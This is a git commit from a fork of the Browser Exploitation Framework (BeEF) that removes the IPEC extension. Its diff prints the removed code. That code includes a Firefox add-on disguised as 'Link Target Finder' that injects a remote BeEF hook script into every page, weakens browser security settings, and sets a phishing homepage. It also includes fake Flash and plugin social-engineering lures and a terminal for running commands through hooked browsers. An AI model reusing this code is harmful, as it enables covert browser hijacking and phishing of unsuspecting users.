Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Extensions: Remove IPEC extension (#2792)

Browse Source 
* Remove browser extension payloads from Social Engineering modules

* Extensions: Remove IPEC extension
This commit is contained in:
bcoles
2023-04-03 15:01:52 +10:00
committed by GitHub
parent 92fe621425
commit 58efd34f8c
31 changed files with 7 additions and 673 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
core/main/ar-migrations/022_create_ipec_exploit.rb
View File

@@ -1,9 +0,0 @@
class CreateIpecExploit < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploits do |t|
t.text :name
t.text :protocol
t.text :os
end
end
end

9
core/main/ar-migrations/023_create_ipec_exploit_run.rb
View File

@@ -1,9 +0,0 @@
class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploit_runs do |t|
t.boolean :launched
t.text :http_headers
t.text :junk_size
end
end
end

1
extensions/admin_ui/api/handler.rb
View File

@@ -78,7 +78,6 @@ module BeEF
ui/panel/tabs/ZombieTabRider.js
ui/panel/tabs/ZombieTabXssRays.js
wterm/wterm.jquery.js
ui/panel/tabs/ZombieTabIpec.js
ui/panel/tabs/ZombieTabAutorun.js
ui/panel/PanelViewer.js
ui/panel/LogsDataGrid.js

1
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -39,7 +39,6 @@ WelcomeTab = function() {
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Proxy:</span> The Proxy tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
Each request sent by the Proxy is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Network:</span> The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>IPEC:</span> Send commands to the victims systems using Inter-Protocol Exploitation/Communication (IPEC)</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>WebRTC:</span> Send commands to the victims systems via a zombie specified as the primary WebRTC caller.</li> \
</ul><br /> \
<p>You can also right-click a hooked browser to open a context-menu with additional functionality:</p><br /> \

4
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -10,7 +10,6 @@ ZombieTab = function(zombie) {
commands_tab = new ZombieTab_Commands(zombie);
proxy_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
network_tab = new ZombieTab_Network(zombie);
webrtc_tab = new ZombieTab_Rtc(zombie);
@@ -32,7 +31,6 @@ ZombieTab = function(zombie) {
commands_tab,
proxy_tab,
xssrays_tab,
ipec_tab,
autorun_tab,
network_tab,
webrtc_tab
@@ -41,8 +39,6 @@ ZombieTab = function(zombie) {
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
// Hide IPEC tab - it's current broken
component.hideTabStripItem(ipec_tab);
// Hide tabs for disabled functionality
<%= BeEF::Core::Configuration.instance.get("beef.extension.webrtc.enable") ? '' : 'component.hideTabStripItem(webrtc_tab);' %>
<%= BeEF::Core::Configuration.instance.get("beef.extension.xssrays.enable") ? '' : 'component.hideTabStripItem(xssrays_tab);' %>

236
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -1,236 +0,0 @@
//
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
* The Ipec Tab panel for the selected zombie.
*/
ZombieTab_IpecTab = function(zombie) {
var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session);
var ipec_config_panel = new Ext.Panel({
id: 'ipec-config-zombie-'+zombie.session,
title: 'Scan Config',
layout: 'fit',
autoscroll: true
});
function get_module_id(name, token){
var id = "";
var url = "/api/modules/search/" + name + "?token=" + token;
$jwterm.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: url,
async: false,
processData: false,
success: function(data){
id = data.id;
},
error: function(){
beef.debug("Error getting module id.");
}
});
return id;
}
function escape_html(str) {
str = str.toString();
str = str.replace(/</g, '&lt;');
str = str.replace(/>/g, '&gt;');
// str = str.replace(/\u0022/g, '&quot;');
str = str.replace(/\u0027/g, '&#39;');
str = str.replace(/\"\"/g, '');
str = str.replace(/\\r/g, '');
str = str.replace(/\\n/g, '<br>');
str = str.replace(/\\\\/g, '\\');
str = str.replace(/\\t/g, '&nbsp;&nbsp;&nbsp;&nbsp;');
// str = str.replace(/\\/g, '&#92;');
return str;
}
function validateNumber(input, min, max) {
var value = parseInt(input);
return (!isNaN(value) && value >= min && value <= max);
}
function initTerminal(zombie){
String.prototype.reverse = function() {
return this.split('').reverse().join('');
};
$jwterm( document ).ready( function() {
$jwterm('#wterm').wterm( { WIDTH: '100%', HEIGHT: '100%', WELCOME_MESSAGE: 'Welcome to BeEF Bind interactive shell. Unfortunately the IPEC shell is currently broken. See: https://github.com/beefproject/beef/issues/1394 - To Begin Using type \'help\'' });
});
var target_ip = "";
var target_port = "";
var command_directory = {
'target': function(tokens){
var ip_regex = new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$');
target_ip = tokens[1];
target_port = tokens[2];
if(ip_regex.test(target_ip) && validateNumber(target_port, 1, 65535)){
return "Target is now " + tokens[1] + ":" + tokens[2];
}else{
return "Target error: invalid IP or port.";
}
},
'exec': function(tokens){
if(target_ip.length == 0 || target_port.length == 0)
return "Error: target ip or port not set."
tokens.shift(); //remove the first element (exec)
var cmd = tokens.join(' '); //needed in case of commands with options
cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
var token = beefwui.get_rest_token();
var mod_id = get_module_id("BeEF_bind_shell", token);
var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
var result = null;
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rhost":target_ip, "rport":target_port, "path":"/", "cmd":cmd}),
dataType: 'json',
type: 'POST',
url: uri,
async: false,
processData: false,
success: function(data){
beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully";
},
error: function(){
beef.debug("Error sending command");
return "Error sending command";
}
});
return result;
},
'get': function(tokens){
var command_id = tokens[1];
if(command_id != null){
var token = beefwui.get_rest_token();
var mod_id = get_module_id("BeEF_bind_shell", token);
var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"
+ command_id + "?token=" + token;
var results = "";
$jwterm.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: uri_results,
async: false,
processData: false,
success: function(data){
$jwterm.each(data, function(i){
beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data;
});
},
error: function(){
beef.debug("Error sending command");
return "Error sending command";
}
});
results = escape_html(results);
if(results.charAt(0) == '"' && results.charAt(results.length-1) == '"')
results = results.slice(1,results.length-1);
return results;
}
},
'strrev': {
PS1: 'strrev $',
EXIT_HOOK: function() {
return 'exit interface commands';
},
START_HOOK: function() {
return 'exit interface commands';
},
DISPATCH: function( tokens ) {
return tokens.join('').reverse();
}
}
};
for( var j in command_directory ) {
$jwterm.register_command( j, command_directory[j] );
}
$jwterm.register_command( 'help', function() {
return 'target - Usage: target &lt;IP&gt; &lt;port&gt; - Send commands to the specified IP:port<br>' +
'exec - Usage exec &lt;command&gt; &lt;command options&gt; - Exec a command, returns the command id.<br>' +
'get - Usage get &lt;command id&gt; - Retrieve command results given a specified command id.<br>'
});
};
var ipec_terminal_panel = new Ext.Panel({
id: 'ipec-terminal-zombie-'+zombie.session,
title: 'Terminal',
layout: 'fit',
padding: '1 1 1 1',
autoScroll: true,
html: "<style>body { background: #000; font-size: 1em;}</style><div id='wterm'></div>",
listeners: {
afterrender : function(){
initTerminal(zombie);
}
}
});
function createIpecTerminalPanel(zombie, bar, value) {
panel = Ext.getCmp('ipec-config-zombie-'+zombie.session);
panel.setTitle('Prompt');
panel.add(ipec_terminal_panel);
}
ZombieTab_IpecTab.superclass.constructor.call(this, {
id: 'ipec-log-tab-'+zombie.session,
title: 'Ipec',
activeTab: 0,
viewConfig: {
forceFit: true,
type: 'fit',
autoScroll:true
},
items: [ipec_config_panel],
bbar: commands_statusbar,
listeners: {
afterrender : function(){
createIpecTerminalPanel(zombie, commands_statusbar);
},
autoScroll:true
}
});
};
Ext.extend(ZombieTab_IpecTab, Ext.TabPanel, {} );

11
extensions/ipec/config.yaml
View File

@@ -1,11 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
ipec:
enable: false
name: 'Inter-Protocol Exploitation'
authors: ["antisnatchor"]

41
extensions/ipec/extension.rb
View File

@@ -1,41 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
# TODO: remove it from here:
# Handlers
# require 'extensions/ipec/fingerprinter'
# require 'extensions/ipec/launcher'
require 'extensions/ipec/junk_calculator'
module Ipec
extend BeEF::API::Extension
@short_name = 'Ipec'
@full_name = 'Inter-Protocol Exploitation'
@description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
module RegisterIpecRestHandler
def self.mount_handler(server)
server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
# TODO: remove it from here, and make it dynamic.
BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator('imapeudora1')
end
end
end
# Models
# todo: to be used when we'll have more IPEC exploits
# require 'extensions/ipec/models/ipec_exploits'
# require 'extensions/ipec/models/ipec_exploits_run'
# RESTful api endpoints
require 'extensions/ipec/rest/ipec'

BIN
extensions/ipec/files/LinkTargetFinder.xpi
View File

Binary file not shown.

8
extensions/ipec/files/LinkTargetFinder/chrome.manifest
View File

@@ -1,8 +0,0 @@
content linktargetfinder chrome/content/
content linktargetfinder chrome/content/ contentaccessible=yes
overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
locale linktargetfinder en-US locale/en-US/
skin linktargetfinder classic/1.0 skin/
style chrome://global/content/customizeToolbar.xul chrome://linktargetfinder/skin/skin.css

22
extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
View File

@@ -1,22 +0,0 @@
<?xml version="1.0"?>
<?xml-stylesheet href="chrome://linktargetfinder/skin/skin.css" type="text/css"?>
<!DOCTYPE linktargetfinder SYSTEM "chrome://linktargetfinder/locale/translations.dtd">
<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="linkTargetFinder.js" />
<menupopup id="menu_ToolsPopup">
<menuitem label="&runlinktargetfinder;" key="link-target-finder-run-key" oncommand="linkTargetFinder.run()"/>
</menupopup>
<keyset>
<key id="link-target-finder-run-key" modifiers="accel alt shift" key="L" oncommand="linkTargetFinder.run()"/>
</keyset>
<statusbar id="status-bar">
<statusbarpanel id="link-target-finder-status-bar-icon" class="statusbarpanel-iconic" src="chrome://linktargetfinder/skin/status-bar.png" tooltiptext="&runlinktargetfinder;" onclick="linkTargetFinder.run()" />
</statusbar>
<toolbarpalette id="BrowserToolbarPalette">
<toolbarbutton id="link-target-finder-toolbar-button" label="Link Target Finder" tooltiptext="&runlinktargetfinder;" oncommand="linkTargetFinder.run()"/>
</toolbarpalette>
</overlay>

43
extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
View File

@@ -1,43 +0,0 @@
/*
* Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
var linkTargetFinder = function () {
var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
return {
init : function () {
gBrowser.addEventListener("load", function () {
//todo change the Extension name
var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
if (autoRun) {
linkTargetFinder.run();
}
}, false);
},
run : function () {
var head = content.document.getElementsByTagName("head")[0];
// add the BeEF hook -- start
var s = content.document.createElement('script');
s.type='text/javascript';
s.src='http://192.168.0.2:3000/hook.js';
head.appendChild(s);
//setTimeout cannot be used (looks like is ignored).
// beef_init if called manually from the console, works perfectly.
// adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
// John Wilander suggestions. we might leave it there anyway.
//alert(1);
//setTimeout(function(){beef_init()}, 5000);
//alert(3);
// add the BeEF hook -- end
}
};
}();
window.addEventListener("load", linkTargetFinder.init, false);

31
extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
View File

@@ -1,31 +0,0 @@
<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<prefwindow
title="Link Target Finder Preferences"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<prefpane label="Link Target Finder Preferences">
<preferences>
<preference id="link-target-finder-autorun" name="extensions.linktargetfinder.autorun" type="bool"/>
</preferences>
<groupbox>
<caption label="Settings"/>
<grid>
<columns>
<column flex="4"/>
<column flex="1"/>
</columns>
<rows>
<row>
<label control="autorun" value="Autorun"/>
<checkbox id="autorun" preference="link-target-finder-autorun"/>
</row>
</rows>
</grid>
</groupbox>
</prefpane>
</prefwindow>

27
extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
View File

@@ -1,27 +0,0 @@
/*
* Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
pref("extensions.linktargetfinder.autorun", false);
// PortBanning override
pref("network.security.ports.banned.override", "20,21,22,25,110,143");
// home page is a phishing page create with BeEF Social Engineering extension,
// the BeEF hook is added.
pref("browser.startup.homepage.override", "http://www.binc.com");
pref("browser.newtab.url", "http://www.binc.com");
pref("browser.startup.page.override", "1");
//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
// new: Firefox/15.0.1
pref("general.useragent.override", "Firefox/15.0.1");
// enable Java
pref("security.enable_java", true);

23
extensions/ipec/files/LinkTargetFinder/install.rdf
View File

@@ -1,23 +0,0 @@
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>linktargetfinder@robertnyman.com</em:id>
<em:name>Link Target Finder</em:name>
<em:version>1.0</em:version>
<em:type>2</em:type>
<em:creator>Robert Nyman</em:creator>
<em:description>Finds links that have a target attribute</em:description>
<em:homepageURL>http://www.robertnyman.com/</em:homepageURL>
<em:optionsURL>chrome://linktargetfinder/content/options.xul</em:optionsURL>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>2.0</em:minVersion>
<em:maxVersion>23.0</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>

1
extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
View File

@@ -1 +0,0 @@
<!ENTITY runlinktargetfinder "Run Link Target Finder">

18
extensions/ipec/files/LinkTargetFinder/skin/skin.css
View File

@@ -1,18 +0,0 @@
/*
* Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
#link-target-finder-toolbar-button {
list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
}
#link-target-finder-status-bar-icon {
width: 83px;
margin: 0 5px;
}
.link-target-finder-selected {
outline: 2px solid red !important;
}

BIN
extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 423 B

BIN
extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.0 KiB

29
extensions/ipec/junk_calculator.rb
View File

@@ -1,29 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Ipec
class JunkCalculator
include Singleton
def initialize
@binded_sockets = {}
@host = BeEF::Core::Configuration.instance.get('beef.http.host')
end
def bind_junk_calculator(name)
port = 2000
# TODO: add binded ports to @binded_sockets. Increase +1 port number if already binded
# if @binded_sockets[port] != nil
# else
# end
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
@binded_sockets[name] = port
end
end
end
end
end

14
extensions/ipec/models/ipec_exploits.rb
View File

@@ -1,14 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
class IpecExploits < BeEF::Core::Model
has_many :ipec_exploits_run
end
end
end
end

14
extensions/ipec/models/ipec_exploits_run.rb
View File

@@ -1,14 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
class IpecExploitsRun < BeEF::Core::Model
belongs_to :ipec_exploit
end
end
end
end

69
extensions/ipec/rest/ipec.rb
View File

@@ -1,69 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Ipec
class IpecRest < BeEF::Core::Router::Router
before do
# NOTE: the method exposed by this class are NOT-AUTHENTICATED.
# They need to be called remotely from a hooked browser.
# error 401 unless params[:token] == config.get('beef.api_token')
# halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Determine the exact size of the cross-domain request HTTP headers.
# Needed to calculate junk properly and prevent errors.
# See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
# todo: the core of this method should be moved to ../junk_calculator.rb
get '/junk/:name' do
socket_name = params[:name]
halt 401 unless BeEF::Filters.alphanums_only?(socket_name)
socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
halt 404 if socket_data.nil?
if socket_data.include?("\r\n\r\n")
result = {}
headers = socket_data.split("\r\n\r\n").first
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
# CRLF -> 4 bytes
result['size'] = headers.size + 4
headers.split("\r\n").each do |line|
result['host'] = line.size + 2 if line.include?('Host')
result['contenttype'] = line.size + 2 if line.include?('Content-Type')
result['referer'] = line.size + 2 if line.include?('Referer')
end
result.to_json
else
print_error '[IPEC] Looks like there is no CRLF in the data received!'
halt 404
end
end
# The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
# If you want to modify the pref.js file, do the following to re-pack the extension:
# $cd firefox_extension_directory
# $zip -r ../result-name.xpi *
get '/ff_extension' do
response['Content-Type'] = 'application/x-xpinstall'
ff_extension = "#{File.expand_path('../../ipec/files', __dir__)}/LinkTargetFinder.xpi"
print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
send_file ff_extension.to_s,
type: 'application/x-xpinstall',
disposition: 'inline'
end
end
end
end
end

21
modules/social_engineering/fake_flash_update/command.js
View File

@@ -8,11 +8,6 @@ beef.execute(function() {
// Module Configurations
var image = "<%== @image %>";
var payload_type = "<%== @payload %>";
var payload_uri = "<%== @payload_uri %>";
var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
var payload = "";
// Function to gray out the screen
var grayOut = function(vis, options) {
@@ -50,20 +45,6 @@ beef.execute(function() {
}
};
// Payload Configuration
switch (payload_type) {
case "Custom_Payload":
payload = payload_uri;
break;
case "Firefox_Extension":
payload = beef_root + "/api/ipec/ff_extension";
break;
default:
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
break;
}
// Create DIV
var flashdiv = document.createElement('div');
flashdiv.setAttribute('id', 'flashDiv');
@@ -73,7 +54,7 @@ beef.execute(function() {
// window.open is very useful when using data URI vectors and the IFrame/Object tag
// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
flashdiv.innerHTML = "<a href=\"" + payload + "\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";
flashdiv.innerHTML = "<a href=\"<%== @payload_uri %>\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";
// gray out the background
grayOut(true,{'opacity':'30'});

2
modules/social_engineering/fake_flash_update/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to <b>Adobe Flash Player</b>.<br />The delivered payload could be a custom file, a browser extension or any specific URI.<br /><br />The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages.<br />See <i>/extensions/ipec/files/LinkTargetFinder</i> directory for the Firefox extension source code.<br /><br />The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br />See <i>/extensions/demos/flash_update_chrome_extension/manifest.json</i> for more info and a sample extension that works on latest Chrome."
description: "Prompts the user to install an update to <b>Adobe Flash Player</b> from the specified URL."
authors: ["mh", "antisnatchor", "gcattani"]
target:
user_notify: ['ALL']

6
modules/social_engineering/fake_flash_update/module.rb
View File

@@ -19,11 +19,7 @@ class Fake_flash_update < BeEF::Core::Command
[
{ 'name' => 'image', 'description' => 'Location of image for the update prompt', 'ui_label' => 'Image', 'value' => image },
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'], ['Firefox_Extension']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload' },
{ 'name' => 'payload_uri', 'description' => 'Custom Payload URI', 'ui_label' => 'Custom Payload URI',
'value' => 'https://github.com/beefproject/beef/archive/master.zip' }
{ 'name' => 'payload_uri', 'description' => 'Payload URI', 'ui_label' => 'Payload URI', 'value' => '' }
]
end

2
modules/social_engineering/fake_notification_ff/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Notification Bar (Firefox)"
description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a file from the the specified URL."
authors: ["xntrik", "bcoles"]
target:
user_notify: ['ALL']

11
modules/social_engineering/fake_notification_ff/module.rb
View File

@@ -5,13 +5,8 @@
#
class Fake_notification_ff < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.get('beef.http.public') || @configuration.get('beef.http.host')
beef_port = @configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
[
{ 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width' => '150px' },
{ 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => '', 'width' => '150px' },
{ 'name' => 'notification_text',
'description' => 'Text displayed in the notification bar',
'ui_label' => 'Notification text',
@@ -19,10 +14,6 @@ class Fake_notification_ff < BeEF::Core::Command
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
content = {}
content['result'] = @datastore['result']

2
modules/social_engineering/replace_video_fake_plugin/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Replace Videos (Fake Plugin)"
description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a file from the specified URL."
authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
target:
user_notify: ['ALL']

7
modules/social_engineering/replace_video_fake_plugin/module.rb
View File

@@ -5,13 +5,8 @@
#
class Replace_video_fake_plugin < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.beef_proto
beef_host = configuration.beef_host
beef_port = configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}"
[
{ 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => "#{url}/api/ipec/ff_extension", 'width' => '150px' },
{ 'name' => 'url', 'ui_label' => 'Payload URL', 'value' => '', 'width' => '150px' },
{ 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' }
]
end

18
spec/beef/extensions/ipec_tunnel_spec.rb
View File

@@ -1,18 +0,0 @@
require 'extensions/ipec/extension'
RSpec.describe 'BeEF Extension IPEC' do
before(:all) do
@config = BeEF::Core::Configuration.instance
@config.load_extensions_config
end
it 'loads configuration' do
expect(@config.get('beef.extension.ipec')).to have_key('enable')
end
it 'interface' do
expect(BeEF::Extension::Ipec::JunkCalculator.instance).to respond_to(:bind_junk_calculator)
end
end